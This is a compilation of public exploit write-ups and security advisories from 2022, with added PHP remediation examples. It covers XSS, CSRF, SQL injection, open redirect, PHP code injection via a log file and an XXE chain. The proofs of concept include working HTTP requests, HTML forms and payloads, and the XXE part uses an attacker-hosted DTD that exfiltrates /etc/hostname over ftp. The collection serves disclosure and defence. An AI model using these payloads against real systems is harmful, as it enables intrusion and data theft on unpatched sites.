<pre><code># Exploit Title: Wavlink WN533A8 - Cross-Site Scripting (XSS)<br /># Exploit Author: Ahmed Alroky<br /># Author Company : AIactive<br /># Version: M33A8.V5030.190716<br /># Vendor home page : wavlink.com<br /># Authentication Required: No<br /># CVE : CVE-2022-34048<br /># Tested on: Windows<br /><br /># Poc code<br /><html><br /> <!-- CSRF PoC - generated by Burp Suite Professional --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://IP_ADDRESS/cgi-bin/login.cgi" method="POST"><br /> <input type="hidden" name="newUI" value="1" /><br /> <input type="hidden" name="page" value="login" /><br /> <input type="hidden" name="username" value="admin" /><br /> <input type="hidden" name="langChange" value="0" /><br /> <input type="hidden" name="ipaddr" value="196.219.234.10" /><br /> <input type="hidden" name="login_page" value="x");alert(9);x=("" /><br /> <input type="hidden" name="homepage" value="main.shtml" /><br /> <input type="hidden" name="sysinitpage" value="sysinit.shtml" /><br /> <input type="hidden" name="wizardpage" value="wiz.shtml" /><br /> <input type="hidden" name="hostname" value="59.148.80.138" /><br /> <input type="hidden" name="key" value="M94947765" /><br /> <input type="hidden" name="password" value="ab4e98e4640b6c1ee88574ec0f13f908" /><br /> <input type="hidden" name="lang_select" value="en" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open<br />Redirect<br /># Date: 01-08-2022<br /># Exploit Author: Mariam Tariq - HunterSherlock<br /># Vendor Homepage: https://wordpress.org/plugins/seatreg/<br /># Version: 1.23.0<br /># Tested on: Firefox<br /># Contact me: mariamtariq404@gmail.com<br /><br /># Description:<br /><br />An Open Redirect is a vulnerability that occurs when a web application or server<br />uses an unvalidated user-submitted link to redirect the user to a given<br />website or page.<br /><br /># Example of Burp Request<br />```<br />POST /wp-admin/admin-post.php HTTP/1.1<br />Host: website.com<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)<br />Gecko/20100101 Firefox/103.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Referer: https://website.com<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 185<br />Origin: https://website.com<br />Connection: close<br />Cookie: {cookies_here}<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: Navigate<br />Sec-Fetch-Site: same-origin<br /><br />new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&_wp_http_referer=https://evil.com&submit=Create+new+registration<br />```<br /># PoC Image:<br /><br />https://ibb.co/tCZWH0H<br />https://ibb.co/5kh299z<br /></code></pre>
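The redirect above works because the submitted `_wp_http_referer` value is trusted as given. The following PHP function is an added example (not SeatReg's or WordPress core's code; `safe_redirect_target` and the `website.com` host are assumptions for illustration) that accepts only same-host http(s) URLs and site-absolute paths, covering the scheme-relative and userinfo variants a naive host check misses. WordPress itself ships `wp_validate_redirect()` and `wp_safe_redirect()` for the same job.

```php
<?php
// Added example, not SeatReg's or WordPress core's code: decide whether a
// user-supplied "_wp_http_referer" value may be used as a redirect target.
// Only same-host http(s) URLs and site-absolute paths are accepted; every
// other input is replaced by $fallback. The host below is a constructed value.

function safe_redirect_target(string $candidate, string $site_host, string $fallback): string
{
    $candidate = trim($candidate);

    // Browsers treat "//host", "/\host" and "\\host" as scheme-relative URLs,
    // so two leading slashes or backslashes already mean "off-site".
    if (preg_match('#^[\\\\/]{2}#', $candidate)) {
        return $fallback;
    }

    $parts = parse_url($candidate);
    if ($parts === false) {
        return $fallback;                       // unparseable input
    }

    // Absolute URL: scheme must be http/https and the host must match exactly
    // (this also defeats "https://website.com@evil.com" userinfo tricks,
    // because parse_url reports evil.com as the host).
    if (isset($parts['scheme']) || isset($parts['host'])) {
        $scheme = strtolower($parts['scheme'] ?? '');
        $host   = strtolower($parts['host'] ?? '');
        if (!in_array($scheme, ['http', 'https'], true) || $host !== strtolower($site_host)) {
            return $fallback;
        }
        return $candidate;
    }

    // Relative target: must start with a single "/". A bare "evil.com" parses
    // as a relative path and is rejected here; "javascript:" values were
    // already caught above as a non-http scheme.
    $path = $parts['path'] ?? '';
    if ($path === '' || $path[0] !== '/') {
        return $fallback;
    }
    return $candidate;
}

// Constructed inputs; the first is the advisory's payload.
$site = 'website.com';
$home = 'https://website.com/wp-admin/';
$cases = [
    'https://evil.com',
    'https://website.com@evil.com/x',
    '//evil.com/phish',
    '/\\evil.com',
    'javascript:alert(1)',
    'https://website.com/wp-admin/admin.php?page=seatreg',
    '/wp-admin/admin.php?page=seatreg',
];
foreach ($cases as $c) {
    printf("%-55s -> %s\n", $c, safe_redirect_target($c, $site, $home));
}
```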
<pre><code># Exploit Title: Crime Reporting System - Blind SQL Injection on Login email parameter <br /># Date: 31/07/2022<br /># Exploit Author: saitamang<br /># Vendor Homepage: code-projects.org<br /># Software Link: https://download-media.code-projects.org/2020/07/Online_Crime_Reporting_System_Project_Report_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD.zip<br /># Version: 1.0<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />Crime Reporting System is vulnerable to a blind (time-based) SQL injection in the email parameter of the login page.<br /><br /># Payload used --> 'or sleep(5)#<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Reliance on File Name or Extension of Externally-Supplied File [CWE-646]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)<br />CVE: CVE-2022-25812<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The plugin's "save_transposh" action available at "/wp-admin/admin.php?page=tp_advanced"<br />does not properly validate the "Log file name" allowing an attacker with the<br />"Administrator" role to specify a .php file as the log destination.<br /><br />Since the log file is stored directly within the "/wp-admin" directory, executing<br />arbitrary PHP code is possible by simply sending a crafted request that gets<br />logged.<br /><br />Successful exploits can allow the attacker to compromise the entire WordPress<br />installation. This is specifically relevant in multi-site installations.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />1. Go to "/wp-admin/admin.php?page=tp_advanced" and "Enable debugging" by pointing<br /> it to a filename with a .php extension.<br />2. Set the "Level of logging" to "Debug".<br />3. Save the settings.<br />4. Submit a payload like "<?php phpinfo();?>" to any of Transposh's functionalities.<br />5. Go to "/wp-admin/[your-filename.php]" to trigger the code injection.<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25812<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
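The root cause in CVE-2022-25812 is that the admin-supplied log file name is used as-is and lands under the web root. The PHP function below is an added example (not Transposh's code; `validate_log_filename` and the directory are assumptions) of the validation a plugin would need: base name only, a pinned `.log` extension, no PHP-like segment anywhere in the name, and a resolved path confined to a dedicated log directory that should itself sit outside the document root.

```php
<?php
// Added example, not Transposh's code: validate an admin-supplied log file
// name before it is used as a log destination. CVE-2022-25812 is possible
// because a ".php" name placed under /wp-admin turns the log into a web
// shell, so the checks below pin the extension, forbid path components and
// confine the file to a dedicated directory.

function validate_log_filename(string $name, string $log_dir): ?string
{
    // 1. Base name only: no directory components, no traversal, no NUL byte.
    if ($name === '' || $name !== basename($name) || strpos($name, "\0") !== false) {
        return null;
    }
    // 2. Conservative character set and exactly one allowed extension, .log.
    if (!preg_match('/^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*\.log$/', $name)) {
        return null;
    }
    // 3. The final extension alone is not enough: Apache's mod_mime with an
    //    AddHandler directive can execute "a.php.log" as PHP, so reject any
    //    PHP-like segment (and .htaccess) anywhere in the name.
    foreach (explode('.', strtolower($name)) as $segment) {
        if (preg_match('/^(php\d*|phtml|phar|htaccess)$/', $segment)) {
            return null;
        }
    }
    // 4. Resolve the directory and confirm the final path stays inside it.
    $real_dir = realpath($log_dir);
    if ($real_dir === false) {
        return null;
    }
    $target = $real_dir . DIRECTORY_SEPARATOR . $name;
    if (strpos($target, $real_dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $target;
}

// Constructed sample inputs; the directory is a placeholder, not the plugin's.
$dir = sys_get_temp_dir();
foreach (['transposh.log', 'debug.2022-07.log', 'shell.php', 'shell.log.php',
          '../../wp-admin/x.log', 'a.php.log', '.htaccess'] as $n) {
    $r = validate_log_filename($n, $dir);
    printf("%-25s => %s\n", $n, $r === null ? 'REJECTED' : $r);
}
```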
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Improper Authorization [CWE-285]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N)<br />CVE: CVE-2022-25811<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The WordPress plugin's "tp_editor" page at "/wp-admin/admin.php?page=tp_editor" is<br />vulnerable to two authenticated, blind SQL Injections when user-supplied input to<br />the HTTP GET parameters "order" and "orderby" is processed by the web application.<br /><br />Since the application does not properly validate and sanitize these parameters, an<br />attacker with the role "Administrator" is able to inject arbitrary SQL commands<br />against the backend database server of the web application.<br /><br />Successful exploits can allow the attacker to access the WordPress backend<br />database and thereby read sensitive contents. This is specifically relevant in<br />multi-site installations.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />To exploit the "order" parameter:<br /><br />GET /wp-admin/admin.php?page=tp_editor&orderby=lang&order=page=tp_editor&orderby=lang&order=asc,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END)) HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Cookie: [Your Cookies]<br />Connection: close<br /><br />To exploit the "orderby" parameter:<br /><br />GET /wp-admin/admin.php?page=tp_editor&orderby=lang&order=page=tp_editor&orderby=lang,(SELECT%20(CASE%20WHEN%20(1=1)%20THEN%20SLEEP(10)%20ELSE%202%20END))&order=asc HTTP/1.1<br />Host: localhost<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0<br />Cookie: [Your Cookies]<br />Connection: close<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25811<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br />https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/<br /></code></pre>
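Both injections above exist because "orderby" and "order" are concatenated into the ORDER BY clause, where they cannot be bound as prepared-statement parameters. The PHP below is an added example (not Transposh's code; the table and column names are assumptions) of the allow-list approach that fixes this class of bug: the request value selects one of a fixed set of identifiers and the direction is normalised to ASC/DESC, so the advisory's `asc,(SELECT ...)` payload never reaches the SQL text.

```php
<?php
// Added example, not Transposh's code: build the ORDER BY clause of a
// listing query from an allow-list instead of interpolating the "orderby"
// and "order" GET parameters. Column names cannot be bound as prepared
// statement parameters, so mapping the request value onto a fixed
// identifier is the standard fix. Table and column names are assumed.

const ALLOWED_ORDERBY = [
    'lang'      => 'lang',        // request value => real column name
    'original'  => 'original',
    'timestamp' => 'timestamp',
];

function build_order_clause(array $get): string
{
    // Non-string values (e.g. orderby[]=x) are treated as absent.
    $by  = is_string($get['orderby'] ?? null) ? $get['orderby'] : '';
    $ord = is_string($get['order'] ?? null) ? $get['order'] : '';

    $column = ALLOWED_ORDERBY[$by] ?? 'timestamp';
    $dir    = strtoupper($ord) === 'DESC' ? 'DESC' : 'ASC';
    // Only the literals above can reach the SQL text; the request's bytes
    // never do, so the advisory's "asc,(SELECT ...)" payload is discarded.
    return sprintf('ORDER BY `%s` %s', $column, $dir);
}

function translations_query(array $get, int $per_page = 20, int $page = 1): array
{
    // Paging values are returned as PDO bindings, not interpolated; bind
    // them with PDO::PARAM_INT so LIMIT/OFFSET receive integers.
    $sql = 'SELECT original, lang, translated, timestamp FROM wp_translations '
         . build_order_clause($get) . ' LIMIT :limit OFFSET :offset';
    return [$sql, ['limit' => $per_page, 'offset' => max(0, $page - 1) * $per_page]];
}

// Constructed inputs; the second carries the advisory's "order" payload.
$benign  = ['orderby' => 'lang', 'order' => 'asc'];
$hostile = ['orderby' => 'lang',
            'order'   => 'asc,(SELECT (CASE WHEN (1=1) THEN SLEEP(10) ELSE 2 END))'];
echo translations_query($benign)[0], "\n";
echo translations_query($hostile)[0], "\n";   // same statement for both inputs
```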
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Improper Authorization [CWE-285]<br />Date found: 2022-02-21<br />Date published: 2022-07-22<br />CVSSv3 Score: 6.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)<br />CVE: CVE-2022-25810<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Transposh does not properly enforce authorization on functionalities available on<br />the plugin's "Utilities" page leading to unauthorized access for all user roles,<br />including "Subscriber".<br /><br />Some of the affected functionality is:<br />tp_backup - Initiate a new backup<br />tp_reset - Reset the plugin's configuration<br />tp_cleanup - Delete automated translations<br />tp_dedup - Delete duplicates<br />tp_maint - Fix internal errors<br />tp_translate_all - Trigger an auto-translation of all entries<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />As an example, to reset the plugin's configuration send the following<br />request using a "Subscriber" account:<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: localhost<br />Content-Length: 15<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />User-Agent: Mozilla/5.0<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: [your cookies]<br />Connection: close<br /><br />action=tp_reset<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-02-21: Discovery of the vulnerability<br />2022-02-21: Contacted the vendor via email<br />2022-02-21: Vendor response<br />2022-02-22: CVE requested from WPScan (CNA)<br />2022-02-23: WPScan assigns CVE-2022-25810<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code># Exploit Title: Geonetwork 4.2.0 - XML External Entity (XXE)<br /># Date: 2022-July-11<br /># Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)<br /># Vendor Homepage: https://geonetwork-opensource.org/<br /># Version: Geonetwork 3.10.X through 4.2.0<br /># Tested on: Microsoft Windows Server & Linux<br /><br /># Description:<br /># GeoNetwork 3.1.x through 4.2.0<br /># Triggered while rendering a map as PDF.<br /># The XML parser is not configured securely when it validates XML documents accepted from an untrusted source, which can result in arbitrary file retrieval from the server.<br /><br />====================PDF RENDERING==================== <br /><br />POST /geonetwork/pdf/create.json HTTP/1.1<br />Host: REDACTED<br />Content-Type: application/json<br />Connection: close<br />Content-Length: 563<br /><br />{"layout":"landscape","srs":"","units":"m","rotation":0,"lang":"fre","dpi":"190","outputFormat":"pdf","layers":[{"opacity":1,"type":"mapServer","baseURL":"http://attacker/xxe.xml","layers":["Tracts",],<br /><br />"format":"image/svg+xml","name":"xxe","extent":[-20037508.34,-20037508.34,20037508.34,<br /><br />20037508.34],<br /><br />"tileSize":[256,256]}],"enableLegends":true,"hasTitle":true,"hasNoTitle":false,"hasAttribution":false,"pages":[{"center":[172063.3620639667,4200083.030736061],"scale":"2.5E7","dataOwner":"© ","rotation":0,"comment":"ok","title":"ok","langfre":true}]}<br /><br /><br />The baseURL parameter points to your XML file:<br /><br />====================XXE_ATTACK==================== <br /><br />====================XXE.XML=======================<br /><br /><!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]><br /><foo>&external;</foo><br /><br />====================X.dtd=========================<br />xxe.xml then loads x.dtd:<br /><br /><!ENTITY % stuff SYSTEM "file:///etc/hostname"><br /><!ENTITY % param1 "<!ENTITY external SYSTEM 'ftp://ATTACKER_FTP/%stuff;'>"><br /><br /></code></pre>
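The chain above only works if the parser resolves the DOCTYPE's parameter entities and is allowed to fetch x.dtd and then exfiltrate over ftp. The PHP loader below is an added example (not GeoNetwork's code, which is Java; `load_untrusted_xml` is an assumption) of the defensive configuration: any document carrying a DOCTYPE is refused outright, and the parse itself runs with network access disabled and entity substitution off, so the advisory's xxe.xml is rejected while a plain layer document is accepted.

```php
<?php
// Added example, not GeoNetwork's code (which is Java): load XML fetched
// from a user-controlled URL without resolving external entities. The
// advisory's chain needs a DOCTYPE whose parameter entity points at an
// attacker-hosted DTD, so this loader rejects any document that carries a
// DOCTYPE at all and, as a second layer, parses with network access off.

function load_untrusted_xml(string $xml): ?DOMDocument
{
    // Cheap pre-check: a DOCTYPE has no legitimate use in layer metadata.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }
    // Collect libxml diagnostics instead of emitting warnings.
    libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    // LIBXML_NONET forbids http/ftp fetches during parsing; LIBXML_NOENT is
    // deliberately not set, so entity references are not substituted.
    // (On PHP < 8.0 also call libxml_disable_entity_loader(true) first.)
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    // Any parse error, or a DOCTYPE that slipped past the text check
    // (e.g. in a different encoding), means the input is refused.
    if (!$ok || $errors !== [] || $dom->doctype !== null) {
        return null;
    }
    return $dom;
}

// Constructed inputs: the advisory's xxe.xml and a harmless layer document.
$xxe = '<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "http://ATTACKER/x.dtd"> %pe; %param1; ]>'
     . '<foo>&external;</foo>';
$benign = '<?xml version="1.0"?><layer><name>Tracts</name></layer>';

foreach (['xxe.xml' => $xxe, 'layer.xml' => $benign] as $label => $doc) {
    $dom = load_untrusted_xml($doc);
    printf("%-10s %s\n", $label,
        $dom === null ? 'rejected' : 'accepted, root <' . $dom->documentElement->nodeName . '>');
}
```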
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2022-07-13<br />Date published: 2022-07-22<br />CVSSv3 Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2022-2462<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />Transposh offers an ajax action called "tp_history" which is intended to return<br />data about who has translated a text given by the "token" parameter. However, the<br />plugin also returns the user's login name as part of the "user_login" attribute.<br /><br />Successful exploits can allow an unauthenticated attacker to leak the WordPress<br />username of translators. If an anonymous user submitted the translation, then the<br />user's IP address is returned.<br /><br /><br />6. 
PROOF OF CONCEPT<br />===================<br />The following Proof-of-Concept returns the information of the translated text<br />"Calendly URL":<br /><br />POST /wp-admin/admin-ajax.php HTTP/1.1<br />Host: [host]<br />Content-Length: 36<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />User-Agent: Mozilla/5.0<br />Connection: close<br /><br />action=tp_history&token=Calendly%20URL&lang=en<br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. REPORT TIMELINE<br />==================<br />2022-07-13: Discovery of the vulnerability<br />2022-07-13: CVE requested from WPScan (CNA)<br />2022-07-18: No response from WPScan<br />2022-07-18: CVE requested from Wordfence (CNA) instead<br />2022-07-18: Sent note to vendor<br />2022-07-18: Wordfence assigns CVE-2022-2462<br />2022-07-20: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code># Exploit Title: Crime reporting system - Stored cross-site scripting (XSS)<br /># Date: 29/07/2022<br /># Exploit Author: Eslam Reda<br /># Vendor Homepage: https://sourcecodehero.com/crime-reporting-system-project-in-php-with-source-code/<br /># Software Link: https://sourcecodehero.com//wp-content/uploads/2022/03/Crime-Reporting-System-Project-in-PHP-with-source-code.zip<br /># Version: v1.0<br /># Tested on: Linux/Windows<br /><br />1. Log in to the application (the default credentials are username: jude, password: 12345) and go to the add users page "/admin/a_users.php".<br />2. Fill in the form with valid information.<br />3. Intercept the traffic with a proxy and add the payload <script>alert(9)</script> in the surname field.<br />4. The payload is stored and executed when visiting "/admin/v_users.php".<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Transposh WordPress Translation<br />Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/<br />Type: Cross-Site Request Forgery [CWE-253]<br />Date found: 2021-08-19<br />Date published: 2022-07-22<br />CVSSv3 Score: 5.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L)<br />CVE: CVE-2021-24912<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Transposh WordPress Translation 1.0.8.1 and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Transposh translation filter for WordPress offers a unique approach to blog<br />translation. It allows your blog to combine automatic translation with human<br />translation aided by your users with an easy to use in-context interface.<br /><br />(from the vendor's homepage)<br /><br /><br />5. 
VULNERABILITY DETAILS<br />========================<br />The WordPress plugin lacks anti-CSRF protection on a lot of its functionalities<br />such as the following WordPress ajax actions:<br /><br />tp_backup - Initiates a new backup<br />tp_reset - Resets the plugin's configuration<br />tp_cleanup - Deletes automated translations<br />tp_dedup - Deletes duplicates<br />tp_maint - Fixes internal errors<br />tp_translate_all - Triggers an auto-translation of all entries<br />tp_translation - Adds a new translation for a given item<br /><br />Since there is no anti-CSRF token protecting these functionalities, they are<br />vulnerable to Cross-Site Request Forgery attacks allowing an attacker to perform<br />a variety of attacks as mentioned above.<br /><br />To successfully exploit this vulnerability, a user with the right to access the<br />Transposh "Utilities" or the right to add new translations must be tricked into<br />visiting an arbitrary website while having an authenticated session in the<br />application.<br /><br /><br />6. PROOF OF CONCEPT<br />===================<br />An exemplary exploit to reset the plugin's configuration:<br /><br /><html><br /> <body><br /> <form action="http://[host]/wp-admin/admin-ajax.php" method="POST"><br /> <input type="hidden" name="action" value="tp_reset" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /><br /><br />7. SOLUTION<br />===========<br />None. Remove the plugin to prevent exploitation.<br /><br /><br />8. 
REPORT TIMELINE<br />==================<br />2021-08-19: Discovery of the vulnerability<br />2021-08-20: Contacted the vendor via their contact form<br />2021-08-20: Vendor response<br />2021-08-20: Sent all the PoC exploits<br />2021-08-20: Vendor acknowledges the issues<br />2021-09-14: Requested status update from vendor<br />2021-10-07: No response from vendor, requested status update again<br />2021-10-25: CVE requested from WPScan (CNA)<br />2021-10-27: WPScan assigns CVE-2021-24912<br />2022-05-22: Sent request for status update on the fix<br />2022-05-24: Vendor states that there is no update planned so far<br />2022-07-22: Public disclosure<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
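The missing-authorization advisory (CVE-2022-25810) and the CSRF advisory (CVE-2021-24912) concern the same set of ajax actions, and the two defences are distinct: a capability check decides who may run an action, and a nonce ties the request to a form the user actually loaded. The PHP below is an added example (not Transposh's code; the capability choices, the `*_nonce` names and the `tp_run_*` hook are assumptions) of a handler that applies both before any privileged work runs, so the Subscriber request and the cross-site form in the two proofs of concept are both refused.

```php
<?php
// Added example, not Transposh's code: a WordPress ajax handler for the
// administrative "tp_*" actions that enforces both authorization
// (CVE-2022-25810: any role, even Subscriber, could call them) and a CSRF
// nonce (CVE-2021-24912: no anti-CSRF token). The capability choices, the
// nonce names and the "tp_run_*" hook are assumptions for illustration.

// Required capability per action. The utilities change global plugin state,
// so they are reserved for administrators; adding a translation is less
// sensitive and tied to the site's editing capability instead.
const TP_ACTION_CAPS = [
    'tp_backup'        => 'manage_options',
    'tp_reset'         => 'manage_options',
    'tp_cleanup'       => 'manage_options',
    'tp_dedup'         => 'manage_options',
    'tp_maint'         => 'manage_options',
    'tp_translate_all' => 'manage_options',
    'tp_translation'   => 'edit_posts',
];

function tp_guarded_ajax(string $action): void
{
    $cap = TP_ACTION_CAPS[$action] ?? null;
    if ($cap === null) {
        wp_send_json_error(['message' => 'unknown action'], 400);   // ends the request
    }
    // 1. Authorization. A nonce is not an authorization mechanism, so this
    //    check is required regardless of the nonce check that follows.
    if (!current_user_can($cap)) {
        wp_send_json_error(['message' => 'forbidden'], 403);
    }
    // 2. CSRF. check_ajax_referer() terminates the request unless the
    //    "security" field carries a nonce created for this exact action,
    //    which a cross-site form like the advisory's PoC cannot supply.
    check_ajax_referer($action . '_nonce', 'security');

    // Only now perform the privileged work (delegated to a hook here).
    do_action('tp_run_' . $action);
    wp_send_json_success(['action' => $action]);
}

// Register for logged-in users only: deliberately no wp_ajax_nopriv_* hook,
// so admin-ajax.php itself refuses unauthenticated requests for these actions.
foreach (array_keys(TP_ACTION_CAPS) as $tp_action) {
    add_action('wp_ajax_' . $tp_action, function () use ($tp_action) {
        tp_guarded_ajax($tp_action);
    });
}

// The admin page must hand the nonce to its script, e.g. via
// wp_create_nonce('tp_reset_nonce'), and post it as security=<nonce>.
```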